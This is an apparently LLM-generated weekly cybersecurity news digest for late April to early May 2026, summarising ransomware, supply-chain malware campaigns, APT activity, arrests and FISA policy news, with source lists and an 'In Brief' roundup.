Weekly Review - May 04, 2026

Covers 7 daily digests (2026-04-28 to 2026-05-04).

All summaries, analysis, and story clustering are done by an LLM. It may make mistakes and say incorrect things. Check the sources and support the actual journalists.

Ransomware

VECT ransomware accidentally functions as a destructive data wiping tool

Active: 2026-04-29, 2026-05-02

VECT 2.0 ransomware contains a critical implementation flaw in its encryption engine that causes files larger than 128 KB to be permanently destroyed rather than encrypted. The malware generates four random 12-byte nonces for large files but only appends the final nonce to the disk, discarding the first three and making recovery impossible even if a ransom is paid. This flaw effectively transforms the ransomware into a data wiper for critical enterprise assets such as VM disks, databases, and backups across Windows, Linux, and ESXi platforms. The malware utilizes raw, unauthenticated ChaCha20-IETF without integrity protection. The threat actor, VECT, has established a partnership with the TeamPCP group and BreachForums to target victims of recent supply-chain attacks against software packages including Trivy, Checkmarx’ KICS, LiteLLM, and Telnyx.

Coverage Timeline

• 2026-04-29: Reports identify that VECT 2.0 ransomware acts as a destructive wiper due to a flaw in its encryption engine and detail a partnership with TeamPCP.
• 2026-05-02: New details clarify that the malware discards the first three of four nonces for large files and identifies Eli Smadja and the Data Security Council of India as involved parties.

Sources

• VECT: Ransomware by design, Wiper by accident - Check Point Research, 2026-04-28 (quality: 20/21)
• Broken VECT 2.0 ransomware acts as a data wiper for large files - BleepingComputer, 2026-04-28 (quality: 18/21)
• VECT 2.0 Ransomware Irreversibly Destroys Files Over 131KB on Windows, Linux, ESXi - The Hacker News, 2026-04-28 (quality: 11/21)
• Vect 2.0 Ransomware Acts as Wiper, Thanks to Design Error - darkreading, 2026-04-29 (quality: 9/21)

Supply Chain Attacks

Malicious VS Code extensions spreading malware through fake OpenVSX plugins

Active: 2026-04-28, 2026-05-02

The GlassWorm threat actor is using a campaign of malicious and "sleeper" extensions on the Open VSX repository to distribute GlassWorm v2 malware. The attack chain involves 73 identified extensions that mimic legitimate listings through typosquatting and identical icons to act as loaders, which then use CLI commands to install secondary VSIX payloads from GitHub. The malware is designed to target multiple IDEs, including VS Code, Cursor, Windsurf, and VSCodium, while specifically avoiding Russian systems. Once active, the payload can install a remote access trojan (RAT) and a rogue Chromium-based extension to steal credentials, bookmarks, and developer environment data such as SSH keys and access tokens. The scope of the campaign has been identified as involving over 320 artifacts since late 2025, with attackers increasingly utilizing Zig-based droppers and transitive dependencies to evade detection.

Coverage Timeline

• 2026-04-28: Socket researchers identify 73 malicious OpenVSX extensions acting as loaders for the Glassworm malware.
• 2026-05-02: New details reveal the campaign involves GlassWorm v2, targets multiple IDEs like Cursor and Windsurf, and includes over 320 identified artifacts.

Sources

• GlassWorm malware attacks return via 73 OpenVSX "sleeper" extensions - BleepingComputer, 2026-04-27 (quality: 18/21)
• Fresh Wave of GlassWorm VS Code Extensions Slices Through Supply Chain - darkreading, 2026-04-28 (quality: 10/21)
• Researchers Uncover 73 Fake VS Code Extensions Delivering GlassWorm v2 Malware - The Hacker News, 2026-04-27 (quality: 19/21)

Nation-State / APT

North Korean Hackers Use AI to Drive npm Supply Chain Attacks

Active: 2026-04-30, 2026-05-01, 2026-05-02

The threat actor TeamPCP, potentially collaborating with LAPSUS$, executed a multi-ecosystem supply chain attack campaign known as "Mini Shai-Hulud" to steal credentials and authentication tokens. The attack initially compromised four SAP npm packages by using a preinstall script to download the Bun JavaScript runtime and execute an obfuscated payload. The scope of the campaign expanded from the npm ecosystem to include the PyPI and Packagist ecosystems, affecting packages such as PyTorch Lightning and Intercom-client. The malware targeted a wide range of sensitive data, including GitHub and npm tokens, SSH keys, cloud credentials for AWS, Azure, and Google Cloud, and cryptocurrency wallet information. The attack chain evolved from using obfuscated JavaScript to employing Node.js single executable applications and pre-compiled Rust-based add-ons.

Coverage Timeline

• 2026-04-30: Reports identify a compromise of four SAP npm packages used to steal credentials via a Bun-based payload.
• 2026-05-01: The scope of the attack is expanded to include the PyPI and Packagist ecosystems, specifically targeting PyTorch Lightning and Intercom packages.
• 2026-05-02: A separate, earlier campaign codenamed PromptMink by the actor Famous Chollima is identified, involving AI-generated code and layered npm packages to target cryptocurrency funds.

Sources

• Official SAP npm packages compromised to steal credentials - BleepingComputer, 2026-04-29 (quality: 20/21)
• SAP-Related npm Packages Compromised in Credential-Stealing Supply Chain Attack - The Hacker News, 2026-04-29 (quality: 20/21)
• PyTorch Lightning and Intercom-client Hit in Supply Chain Attacks to Steal Credentials - The Hacker News, 2026-04-30 (quality: 20/21)
• 1,800 Hit in Mini Shai-Hulud Attack on SAP, Lightning, Intercom - SecurityWeek, 2026-05-01 (quality: 20/21)
• SAP NPM Packages Targeted in Supply Chain Attack - SecurityWeek, 2026-04-30 (quality: 9/21)
• TeamPCP Hits SAP Packages With 'Mini Shai-Hulud' Attack - darkreading, 2026-04-30 (quality: 10/21)
• New Wave of DPRK Attacks Uses AI-Inserted npm Malware, Fake Firms, and RATs - The Hacker News, 2026-04-29 (quality: 20/21)

Phishing & Social Engineering

Silver Fox deploys ABCDoor malware in targeted phishing and backdoor attacks

Active: 2026-04-28, 2026-05-02, 2026-05-04

The Silver Fox threat group conducted a large-scale phishing campaign involving over 1,600 malicious emails targeting organizations in India, Russia, Japan, and Indonesia. The attack chain utilizes tax-themed emails containing PDF attachments or links to malicious archives to deliver a modified RustSL loader. This loader executes shellcode to deploy the ValleyRAT backdoor and a Python-based backdoor known as ABCDoor, which uses the pythonw.exe process to evade detection and ffmpeg.exe for screen capturing. The campaign employs a "Phantom Persistence" technique to intercept system shutdown signals and trigger reboots to ensure malware execution upon startup. Affected sectors include industrial, consulting, retail, and transportation industries.

Coverage Timeline

• 2026-05-02: Kaspersky reports that Silver Fox used a RustSL loader to deploy ValleyRAT and ABCDoor backdoors against targets in Russia and India.
• 2026-05-04: Kaspersky provides additional details on the attack chain, including the use of tax-themed phishing emails, the specific use of pythonw.exe and ffmpeg.exe by ABCDoor, and the implementation of the "Phantom Persistence" technique.

Sources

• BlackFile actively extorting data-theft victims in retail and hospitality sector - CyberScoop, 2026-04-27 (quality: 20/21)
• Silver Fox uses the new ABCDoor backdoor to target organizations in Russia and India - Securelist, 2026-04-30 (quality: 17/21)
• Silver Fox Deploys ABCDoor Malware via Tax-Themed Phishing in India and Russia - The Hacker News, 2026-05-04 (quality: 19/21)

Legal & Law Enforcement

Scattered Spider suspect arrested in Finland facing potential US extradition

Active: 2026-04-29, 2026-05-04

A 19-year-old dual U.S. and Estonian citizen, known as "Bouquet," was arrested at Helsinki Airport while attempting to travel to Japan. The individual is accused of participating in cyberattacks as part of the Scattered Spider threat group, which utilizes social engineering, SMS phishing, and MFA bombing to compromise systems. In May 2025, the group allegedly breached an unnamed luxury retailer by impersonating employees to manipulate IT helpdesk staff into resetting authentication credentials, resulting in the theft of 100 GB of data and $2 million in remediation costs. The group's activities have also been linked to potential breaches of Marks & Spencer and Harrods, as well as previous attacks against MGM Resorts and Caesars Entertainment. Tyler Robert Buchanan, a leader within the group, recently pleaded guilty to federal charges related to wire fraud and identity theft.

Coverage Timeline

• 2026-04-29: The report identifies the arrested suspect as "Bouquet" and provides an extensive list of known victims, including Twilio, DoorDash, and Reddit.
• 2026-05-04: The report specifies the legal charges facing the suspect as including extradition, conspiracy, and computer intrusion, and notes that the timing of the luxury retailer attack aligns with attacks against Marks & Spencer and Harrods.

Sources

• US reportedly charges Scattered Spider hacker arrested in Finland - BleepingComputer, 2026-04-28 (quality: 18/21)
• Teenager alleged to be Scattered Spider hacker arrested in Finland, faces US extradition - GRAHAM CLULEY, 2026-05-04 (quality: 18/21)

Global authorities unite to dismantle massive international cryptocurrency fraud networks

Active: 2026-04-30, 2026-05-04

A coordinated international law enforcement operation involving authorities from the United States, China, the UAE, and Thailand dismantled nine cryptocurrency scam centers and arrested at least 276 suspects. The investigation, which included the FBI's "Operation Level Up," targeted "pig-butchering" schemes where actors used social media and search engine advertisements to lure victims into fake investment platforms. These operations utilized remote access software to manipulate victim devices and psychological pressure to solicit deposits, resulting in estimated losses of hundreds of millions of dollars. The crackdown also led to the seizure of significant assets and the identification of various criminal entities, including the Ko Thet Company and Sanduo Group. Additionally, the U.S. Treasury Department issued sanctions against several individuals, such as Kok An and Ly Yong Phat, linked to these fraudulent business operations.

Coverage Timeline

• 2026-04-30: BleepingComputer and other outlets report on a joint US-China-Dubai operation that arrested 276 suspects and dismantled nine crypto scam centers.
• 2026-04-30: Europol and Eurojust report on a separate, large-scale dismantling of an Albanian cryptocurrency fraud ring responsible for over €50 million in losses.
• 2026-05-04: New details emerge regarding the global crackdown, including the specific involvement of the U.S. Treasury Department's sanctions against individuals like Kok An and the identification of additional threat actors and researchers.

Sources

• Police dismantles 9 crypto scam centers, arrests 276 suspects - BleepingComputer, 2026-04-30 (quality: 17/21)
• US, China partner on scam center takedown in Dubai - The Record from Recorded Future News, 2026-04-29 (quality: 19/21)
• European police dismantles €50 million crypto investment fraud ring - BleepingComputer, 2026-04-29 (quality: 19/21)
• Global Crackdown Arrests 276, Shuts 9 Crypto Scam Centers, Seizes $701M - The Hacker News, 2026-05-04 (quality: 20/21)

Police arrest hackers responsible for massive Roblox account theft and hijacking

Active: 2026-04-29, 2026-04-30

Three individuals aged 19, 21, and 22 were arrested by Ukrainian authorities for hijacking and selling over 610,000 Roblox accounts. Between October 2025 and January 2026, the group distributed info-stealing malware disguised as game-enhancement software to harvest login credentials and sensitive data from players. The stolen accounts, which included at least 357 high-value "elite" accounts, were categorized by inventory rarity and Robux balances before being sold for cryptocurrency on Russian websites and closed online communities. The operation generated approximately $225,000 in profit. Law enforcement conducted ten searches in Ukraine's western region, seizing computers, mobile phones, and cash during the arrests.

Coverage Timeline

• 2026-04-29: The Record reports that Ukrainian police detained a 19-year-old organizer and accomplices involved in a massive Roblox account theft campaign.
• 2026-04-30: BleepingComputer provides additional details, identifying the ages of the three arrested individuals and specifying that at least 357 of the compromised accounts were high-value "elite" accounts.

Sources

• Ukrainian police detain hackers suspected of stealing thousands of Roblox accounts for resale - The Record from Recorded Future News, 2026-04-28 (quality: 17/21)
• Hackers arrested for hijacking and selling 610,000 Roblox accounts - BleepingComputer, 2026-04-29 (quality: 16/21)

Policy & Regulation

Congress passes Section 702 FISA extension following period of intense debate

Active: 2026-05-01, 2026-05-02

The United States Congress passed a 45-day extension of Section 702 of the Foreign Intelligence Surveillance Act to prevent the expiration of warrantless surveillance authorities. The legislative process involved a House-passed three-year reauthorization containing a ban on central bank digital currency, which the Senate rejected in favor of the shorter extension. Senator Ron Wyden initially withheld consent for the extension until Senate Intelligence Committee leaders, Tom Cotton and Mark Warner, agreed to seek the declassification of a Foreign Intelligence Surveillance Court (FISC) opinion. This FISC opinion, dated March 17, identified major compliance problems regarding the surveillance program and blocked certain communication analysis tools, prompting an appeal by the Department of Justice. The extension provides a temporary window for lawmakers to negotiate a permanent reauthorization and discuss potential reforms.

Coverage Timeline

• 2026-05-01: Reports indicate that Congress delayed a critical decision on FISA renewal, resulting in a 45-day extension passed by the House.
• 2026-05-02: Reports clarify that Senator Ron Wyden's consent was a key factor in the extension and detail the specific agreement to seek declassification of a FISC letter.

Sources

• Congress kicks the can down the road on surveillance law (again) - CyberScoop, 2026-04-30 (quality: 18/21)
• Congress punts FISA renewal to June - The Record from Recorded Future News, 2026-04-30 (quality: 15/21)

In Brief

Notable one-off stories with significant broader implications.

• Chinese Hacker Extradited to U.S. Amid Privacy Law Shifts (2026-04-28)
  • Alleged Silk Typhoon hacker extradited to US for cyberespionage - BleepingComputer
  • Chinese national extradited to US for pandemic-era Silk Typhoon attacks - CyberScoop
  • Supreme Court justices skeptically question both sides in geofence surveillance case - CyberScoop
  • Supreme Court signals location data searches should require a warrant - The Record from Recorded Future News
  • Italy extradites alleged Chinese state hacker to US - The Record from Recorded Future News
  • Chinese Silk Typhoon Hacker Extradited to U.S. Over COVID Research Cyberattacks - The Hacker News
• Two cybersecurity experts sentenced to four years for ransomware attacks. (2026-05-02)
  • Cyber incident responders who carried out ransomware attacks given 4-year sentences - The Record from Recorded Future News
  • US ransomware negotiators get 4 years in prison over BlackCat attacks - BleepingComputer
  • Former incident responders sentenced to 4 years in prison for committing ransomware attacks - CyberScoop
  • Two US Security Experts Sentenced to Prison for Helping Ransomware Gang - SecurityWeek
  • Two Cybersecurity Professionals Get 4-Year Sentences in BlackCat Ransomware Attacks - The Hacker News
• Vimeo confirms user data breach caused by Anodot security incident. (2026-04-29)
  • Video service Vimeo confirms Anodot breach exposed user data - BleepingComputer
  • Video site Vimeo blames security incident on Anodot breach - The Record from Recorded Future News
  • Vimeo Confirms User and Customer Data Breach - SecurityWeek
• FBI warns of surge in multimillion-dollar cargo theft by hackers. (2026-05-01)
  • FBI links cybercriminals to sharp surge in cargo theft attacks - BleepingComputer
  • Hackers earning millions from hijacked cargo, FBI says - The Record from Recorded Future News
  • FBI Warns of Surge in Hacker-Enabled Cargo Theft - SecurityWeek
• Major data breaches impact millions at ADT and Medtronic. (2026-04-28)
  • Home security giant ADT data breach affects 5.5 million people - BleepingComputer
  • Medtronic confirms breach after hackers claim 9 million records theft - BleepingComputer
  • Medtronic Hack Confirmed After ShinyHunters Threatens Data Leak - SecurityWeek
• Chinese Silk Typhoon hacker extradited to U.S. for cyberattacks. (2026-05-02)
  • Alleged Silk Typhoon hacker extradited to the United States to face charges - GRAHAM CLULEY
  • Chinese Silk Typhoon Hacker Extradited to U.S. Over COVID Research Cyberattacks - The Hacker News
• New Cybercrime Groups Using Vishing and SSO for SaaS Extortion (2026-05-02)
  • Cybercrime Groups Using Vishing and SSO Abuse in Rapid SaaS Extortion Attacks - The Hacker News
  • Two new extortion crews are speedrunning the Scattered Spider playbook - CyberScoop
• Cyberattacks target critical infrastructure to steal sensitive strategic data. (2026-05-02)
  • Cyber spies target Russian aviation firms to steal satellite and GPS data - The Record from Recorded Future News
  • Lotus Wiper Attack Targets Venezuelan Energy Firms, Utilities - darkreading
• FBI warns of surge in hacker-enabled cargo theft attacks. (2026-05-02)
  • FBI links cybercriminals to sharp surge in cargo theft attacks - BleepingComputer
  • FBI Warns of Surge in Hacker-Enabled Cargo Theft - SecurityWeek
• Checkmarx confirms data leak following LAPSUS$ supply chain attack. (2026-04-29)
  • Checkmarx confirms LAPSUS$ hackers leaked its stolen GitHub data - BleepingComputer
  • Checkmarx Confirms Data Stolen in Supply Chain Attack - SecurityWeek
• New Python Backdoor Enables Espionage and Credential Theft (2026-05-02)
  • Sophisticated Deep#Door Backdoor Enables Espionage, Disruption - SecurityWeek
  • New Python Backdoor Uses Tunneling Service to Steal Browser and Cloud Credentials - The Hacker News
• Fake CAPTCHA Scams Drive Global SMS and Crypto Fraud (2026-05-02)
  • Fake CAPTCHA IRSF Scam and 120 Keitaro Campaigns Drive Global SMS, Crypto Fraud - The Hacker News
  • Fake CAPTCHA scam turns a quick click into a costly phone bill - Malwarebytes
• Social media and deepfake scams cost Americans billions in 2025. (2026-04-28)
  • FTC: Americans lost over $2.1 billion to social media scams in 2025 - BleepingComputer
  • Deepfake Voice Attacks are Outpacing Defenses: What Security Leaders Should Know - BleepingComputer
• Microsoft Defender Misidentifies DigiCert Certificates as Trojan Malware (2026-05-04)
  • Microsoft Defender wrongly flags DigiCert certs as Trojan:Win32/Cerdigent.A!dha - BleepingComputer
• BlueNoroff Uses Fake Zoom Calls and AI Avatars to Target Crypto-Executives (2026-05-02)
  • BlueNoroff Uses Fake Zoom Calls to Turn Victims Into Attack Lures - darkreading
• FEMITBOT uses Telegram Mini Apps for crypto scams and malware (2026-05-04)
  • Telegram Mini Apps abused for crypto scams, Android malware delivery - BleepingComputer
• OpenClaw Agent Skills Vulnerabilities Enable Malware and Data Theft (2026-05-04)
  • How OpenClaw’s agent skills become an attack surface - Cybersecurity Dive - Latest News
• Google, Microsoft, and OpenAI to Provide AI for DoD Classified Networks (2026-05-04)
  • US Military Reaches Deals With 7 Tech Companies to Use Their AI on Classified Systems - SecurityWeek
• House Passes Surveillance Program Amid Uncertain Senate Future (2026-04-30)
  • House approves spy program on second attempt, Senate fate murky - The Record from Recorded Future News
• Google AppSheet Phishing Campaign Steals Thousands of Facebook Accounts (2026-05-04)
  • Thousands of Facebook accounts stolen by phishing emails sent through Google - Malwarebytes
• cPanel Bug, PayPal Scams, and US Military Software Theft Reported (2026-05-04)
  • A week in security (April 27 – May 3) - Malwarebytes
• PhantomRPC Vulnerability Enables New Windows Privilege Escalation Attacks (2026-04-28)
  • No Patch for New PhantomRPC Privilege Escalation Technique in Windows - SecurityWeek
• 2026 FIFA World Cup Scams Target Fans With Fake Merchandise (2026-05-04)
  • The 2026 World Cup scam economy is already running before the first whistle - Malwarebytes
• Amazon SES Exploited in Phishing Campaigns via Leaked AWS Keys (2026-05-04)
  • “Legitimate” phishing: how attackers weaponize Amazon SES to bypass email security - Securelist
• MacSync Stealer distributed via fake Homebrew advertisements on macOS (2026-05-02)
  • Malicious Ad for Homebrew Leads to MacSync Stealer, (Fri, May 1st) - SANS Internet Storm Center, InfoCON: green
• Instructure investigates cyberattack following security incident at Canvas developer (2026-05-02)
  • Edu tech firm Instructure discloses cyber incident, probes impact - BleepingComputer
• Teen Detained for Selling Stolen ANTS Data via 'breach3d' Alias (2026-05-02)
  • 15-year-old detained over French govt agency data breach - BleepingComputer
• White House ONCD Queries Tech Giants Over AI Cybersecurity Resilience (2026-05-02)
  • White House questions tech industry on defensive AI use, cybersecurity resilience - Cybersecurity Dive - Latest News
• AccountDumpling Campaign Hacks 30,000 Facebook Accounts via Google AppSheet (2026-05-02)
  • 30,000 Facebook Accounts Hacked via Google AppSheet Phishing Campaign - The Hacker News
• SHADOW-EARTH-053 Uses ShadowPad to Target Asian and NATO Entities (2026-05-02)
  • China-Linked Hackers Target Asian Governments, NATO State, Journalists, and Activists - The Hacker News
• PocketOS production database and backups deleted by AI coding agent (2026-05-02)
  • If AI's So Smart, Why Does It Keep Deleting Production Databases? - darkreading
• Malicious AI Extensions Steal Emails and Passwords via Browser Permissions (2026-05-02)
  • That AI Extension Helping You Write Emails? It’s Reading Them First - Unit 42
• VNC Servers Expose ICS/OT to Infrastructure Destruction Squad Attacks (2026-04-29)
  • Hundreds of Internet-Facing VNC Servers Expose ICS/OT - SecurityWeek
• Huge Networks infrastructure used for massive attacks on Brazilian ISPs (2026-05-02)
  • Anti-DDoS Firm Heaped Attacks on Brazilian ISPs - Krebs on Security
• Handala Hackers Leak US Marines Data and Issue WhatsApp Threats (2026-05-02)
  • Iran-linked Handala hackers leak US Marines data, send chilling WhatsApp threats - GRAHAM CLULEY
• HexDex hacker arrested for 100 breaches, including French education data (2026-05-02)
  • French police arrest 21-year-old “HexDex” hacker over 100 alleged data breaches - GRAHAM CLULEY
• Ransomware Negotiator Pleads Guilty to Working for Criminal Gang (2026-05-02)
  • A Ransomware Negotiator Was Working for a Ransomware Gang - Schneier on Security
• Vidar Infostealer Surges Following Dismantling of Lumma and Rhadamanthys (2026-05-02)
  • Vidar Rises to Top of Chaotic Infostealer Market - darkreading
• CVE-2024-4577 Exploits Drive Redtail Cryptomining Malware Attacks (2026-05-02)
  • Danger of Libredtail [Guest Diary], (Wed, Apr 29th) - SANS Internet Storm Center, InfoCON: green
• Broadcom API Gateway and ESP32 IoT Devices Targeted by Reconnaissance (2026-05-02)
  • Today's Odd Web Requests, (Wed, Apr 29th) - SANS Internet Storm Center, InfoCON: green
• ConsentFix v3 Uses OAuth Abuse to Target Microsoft Azure Accounts (2026-05-02)
  • ConsentFix v3 attacks target Azure with automated OAuth abuse - BleepingComputer
• Thomasz Szabo Sentenced to Four Years for Leading Swatting Ring (2026-05-02)
  • Romanian leader of online swatting ring gets 4 years in prison - BleepingComputer
• Sprocket Security: Attackers Scan New Assets Within Minutes of Launch (2026-05-02)
  • What Happens in the First 24 Hours After a New Asset Goes Live - BleepingComputer
• FCC Strengthens KYC Rules to Block Banned Foreign Telecom Services (2026-05-02)
  • FCC tightens KYC rules for telecoms, closes loophole for banned foreign services - CyberScoop
• 0APT and KryBit exchange leaked data in retaliatory cyberattacks (2026-05-02)
  • Feuding Ransomware Groups Leak Each Other's Data - darkreading
• LofyGang Resurfaces Using LofyStealer Malware to Target Minecraft Players (2026-05-02)
  • Brazilian LofyGang Resurfaces After Three Years With Minecraft LofyStealer Campaign - The Hacker News
• Handala Targets US Marines in Bahrain via WhatsApp Influence Campaign (2026-04-29)
  • Iranian Cyber Group Handala Targets US Troops in Bahrain - SecurityWeek
• UNC6692 Uses Snow Malware and Cloud Abuse in New Campaign (2026-05-02)
  • UNC6692 Combines Social Engineering, Malware, Cloud Abuse - darkreading
• US Agencies Issue New Zero-Trust Guidance for OT Networks (2026-05-02)
  • US agencies promote zero-trust practices for operational technology networks - Cybersecurity Dive - Latest News
• Firestarter malware persists on Cisco devices despite security patches (2026-04-28)
  • US, UK authorities warn that Firestarter backdoor malware survives patching - Cybersecurity Dive - Latest News
• Hugging Face and ClawHub Exploited to Distribute Malicious Files (2026-05-02)
  • Hugging Face, ClawHub Abused for Malware Distribution - SecurityWeek
• BufferZoneCorp Uses Malicious Ruby and Go Modules to Steal Credentials (2026-05-02)
  • Poisoned Ruby Gems and Go Modules Exploit CI Pipelines for Credential Theft - The Hacker News
• EtherRAT Malware Distributed via Fake GitHub Administrative Tools (2026-05-02)
  • EtherRAT Distribution Spoofing Administrative Tools via GitHub Facades - The Hacker News
• PhantomCore exploits TrueConf vulnerabilities to breach Russian networks (2026-05-02)
  • PhantomCore Exploits TrueConf Vulnerabilities to Breach Russian Networks - The Hacker News
• PayPal email subject lines manipulated to deliver tech support scams (2026-05-02)
  • More PayPal emails hijacked to deliver tech support scams - Malwarebytes
• Three Arrested in Lviv for Stealing 610,000 Roblox Accounts (2026-05-02)
  • Hackers stole hundreds of thousands of Roblox accounts: Here’s what to do - Malwarebytes
• UK Regulations Increase Board Liability for Deepfake-Enabled Fraud (2026-05-02)
  • Deepfakes Are Now a Board-Level Risk & Regulators Are Watching - Corporate Compliance Insights
• OpenClaw Security Flaw Exposes 1.5 Million Authentication Tokens Globally (2026-05-02)
  • OpenClaw Reveals Hidden Security Risks of Agentic AI - Corporate Compliance Insights
• FINRA Continues Penalizing Unapproved WhatsApp and WeChat Messaging Use (2026-05-02)
  • FINRA Is Still Following Off-Channel Enforcement Even If the SEC Isn’t Leading - Corporate Compliance Insights
• BleepingComputer retracts report on Instructure data breach error (2026-05-02)
  • Story retracted - BleepingComputer
• Scattered Spider Hacker Arrested Amid New NSA Tool Vulnerabilities (2026-05-02)
  • In Other News: Scattered Spider Hacker Arrested, SOC Effectiveness Metrics, NSA Tool Vulnerability - SecurityWeek
• ADT Breach and LiteLLM SQL Injection Vulnerability Highlight Risks (2026-05-02)
  • Great responsibility, without great power - Cisco Talos Blog
• Bitwarden CLI and Vercel Face New Supply-Chain Security Threats (2026-05-02)
  • 27th April – Threat Intelligence Report - Check Point Research
• Roblox developer loses millions after using malicious cheating script (2026-05-02)
  • Smashing Security podcast #465: This developer wanted to cheat at Roblox. It cost millions - GRAHAM CLULEY
• Alibaba Leak Exposes UK Medical Data of 500,000 Volunteers (2026-05-02)
  • A week in security (April 20 – April 26) - Malwarebytes
• Access Now cancels RightsCon in Zambia following government intervention (2026-05-01)
  • Zambia cancels global digital freedoms conference days before start - The Record from Recorded Future News
• Quick Page/Post Redirect plugin backdoor discovered after years of dormancy (2026-04-30)
  • Popular WordPress redirect plugin hid dormant backdoor for years - BleepingComputer
• European Commission Alleges Meta Violated Child Safety Under DSA Rules (2026-04-30)
  • European Commission accuses Meta of breaching child safety rules - The Record from Recorded Future News
• Black Axe members arrested in Swiss romance scam crackdown (2026-04-30)
  • Swiss police arrest 10 suspected members of Nigeria-linked crime group Black Axe - The Record from Recorded Future News
• Inc Ransom Breach Exposes Data of 170,000 Sandhills Medical Patients (2026-04-30)
  • Sandhills Medical Says Ransomware Breach Affects 170,000 - SecurityWeek
• Flare Researchers Uncover Three-Tier OPSEC Framework for Carding Operations (2026-04-29)
  • Inside an OPSEC Playbook: How Threat Actors Evade Detection - BleepingComputer
• Robinhood account creation flaw exploited to launch phishing attacks (2026-04-28)
  • Robinhood account creation flaw abused to send phishing emails - BleepingComputer
• Three Arrested in Toronto for Operating Massive SMS Blaster Device (2026-04-28)
  • Canada arrests three for operating “SMS blaster” device in Toronto - BleepingComputer
• elementary-data PyPI package compromised to distribute infostealer malware (2026-04-28)
  • PyPI package with 1.1M monthly downloads hacked to push infostealer - BleepingComputer
• Evan Tangeman Sentenced for Laundering $3.5M in Massive Crypto Heist (2026-04-28)
  • Money launderer linked to $230M crypto heist gets 70 months in prison - BleepingComputer
• Senators Probe Navigate360 Breach Over Compromised Student Data Anonymity (2026-04-28)
  • Senators seek answers about hackers obtaining sensitive student data from ostensibly anonymous tip line - CyberScoop
• Spamouflage network targets Tibetan parliament-in-exile elections with disinformation (2026-04-28)
  • Disinformation campaign targeted Tibetan parliament-in-exile elections - The Record from Recorded Future News
• Germany Suspects Russia of Phishing Top Officials via Signal (2026-04-28)
  • Germany Suspects Russia Is Behind Signal Phishing That Targeted Top Officials - SecurityWeek
• APT28 Exploits CVE-2026-32202 for Zero-Click Windows Attacks (2026-04-28)
  • Incomplete Windows Patch Opens Door to Zero-Click Attacks - SecurityWeek

Reported Data Breaches

Breaches reported via Have I Been Pwned this period.

• Reborn Gaming Breach Compromises 126 User Accounts (2026-05-04)
• Major Data Breaches Impact Marcus & Millichap and Instructure (2026-05-04)
• ShinyHunters Leaks Over 5 Million ZenBusiness User Accounts (2026-05-02)
• Aman Data Breach Compromises Over 215,000 User Accounts (2026-05-02)
• Pitney Bowes Breach Compromises Over 8 Million User Accounts (2026-05-02)
• ADT Breach Exposes Over 5.4 Million User Accounts (2026-05-02)
• Over 1.4 Million Udemy Accounts Compromised in Major Data Breach (2026-05-02)